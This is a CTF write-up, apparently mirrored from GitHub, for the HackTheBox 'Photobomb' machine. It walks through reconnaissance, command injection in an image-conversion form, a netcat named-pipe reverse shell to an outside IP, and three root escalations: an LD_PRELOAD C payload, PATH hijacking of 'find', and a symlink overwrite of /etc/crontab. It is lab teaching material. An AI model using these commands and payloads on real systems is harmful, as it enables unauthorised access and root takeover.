Mirrors/CTF-Writeups
2
0
Fork 0
mirror of https://github.com/AbdullahRizwan101/CTF-Writeups synced 2024-11-22 03:53:03 +00:00
Code Issues Projects Releases Packages Wiki Activity
CTF-Writeups/HackTheBox/Photobomb.md
ARZ e047e16549
Create Photobomb.md
2023-05-26 04:21:28 +03:00

5.7 KiB
Raw Blame History

HackTheBox - Photobomb

NMAP

Nmap scan report for 10.10.11.182
Host is up (0.093s latency).
Not shown: 54171 closed tcp ports (conn-refused), 11362 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e2:24:73:bb:fb:df:5c:b5:20:b6:68:76:74:8a:b5:8d (RSA)
|   256 04:e3:ac:6e:18:4e:1b:7e:ff:ac:4f:e3:9d:d2:1b:ae (ECDSA)
|_  256 20:e0:5d:8c:ba:71:f0:8c:3a:18:19:f2:40:11:d2:9e (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT 80 (HTTP)

Visting the web server, it's going to redirect us to photobomb.htb so we need to add it in hosts file

It shows a link which takes us to /printer that asks for credentials

We can find the credentials by checking the source of the site which shows a js file having the credentials

With this, we can access the printer page

What this page does it converts the image into either png or jpg into the specified dimensions displayed on the site

If we remove any of the POST paramter when downloading the file, it's going to show a stack error revealing that it's using ruby sinatra server

Foothold

We can see from the stackerror that the filetype parameter is being checked if it contains either png or jpeg, so we can try command injection there, I tried appending the id command with ; but it didn't returned any output

So I tried making a curl request to my python server which was successful

Using openbsd nc's reverse shell payload by making it url encoded

rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.72 2222 >/tmp/f

Stabilizing the shell with python3

Privilege Escalation (root)

Running sudo -l shows that we can run cleanup.sh as a root user

Method 1

This is allowing us to set environment variables, which means we can set LD_PRELOAD path which contains the path to the shared library that will be loaded before anything else, so we can abuse this by compiling this program into a shared library which will set bash a SUID and will spawn it with bash -p giving us a root shell

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
        unsetenv("LD_PRELOAD");
        setresuid(0,0,0);
        system("/bin/bash -p");
}

gcc -fPIC -shared -nostartfiles -o ./load.so ./test.c

sudo LD_PRELOAD=/tmp/load.so /opt/cleanup.sh

Method 2

Checking the script which we can run

#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;

This script is switching to /home/wizard/photobomb, where with -s it checks if photobomb.log exists and is empty, with -L and ! it checks if the logfile isn't a symlink to avoid symlinking and then overwrites the content of photobomb.log to photobomb.log and clears out the the contents of the log file, then with find it look for all jpg files and makes root the owner of those images

Now here find isn't being ran through it's absolute path which means that we can abuse it by making a file which will spawn bash for us by setting environment variables through which we can achieve PATH variable exploit

sudo PATH=/tmp:$PATH /opt/cleanup.sh

Method 3

Going back to the script, the if condition checks for photobomb.log but not photobomb.log.old so we can symlink the old log file with /etc/crontab and include the crontab in the original log file which will basically overwrite the crontab file

So symlinking the file with cronab

ln -sf /etc/crontab photobomb.log.old

Now place a bash script which will make bash a SUID or you can place a reverse shell there

#!/bin/bash
chmod +s /bin/bash

* * * * * root /tmp/shell.sh

Putting the cronab in photobomb.log file which will overwrite the old log file which will then overwrite the cronab file, making bash a SUID and then we can spawn bash with -p to execute it as the SUID owner which is root

References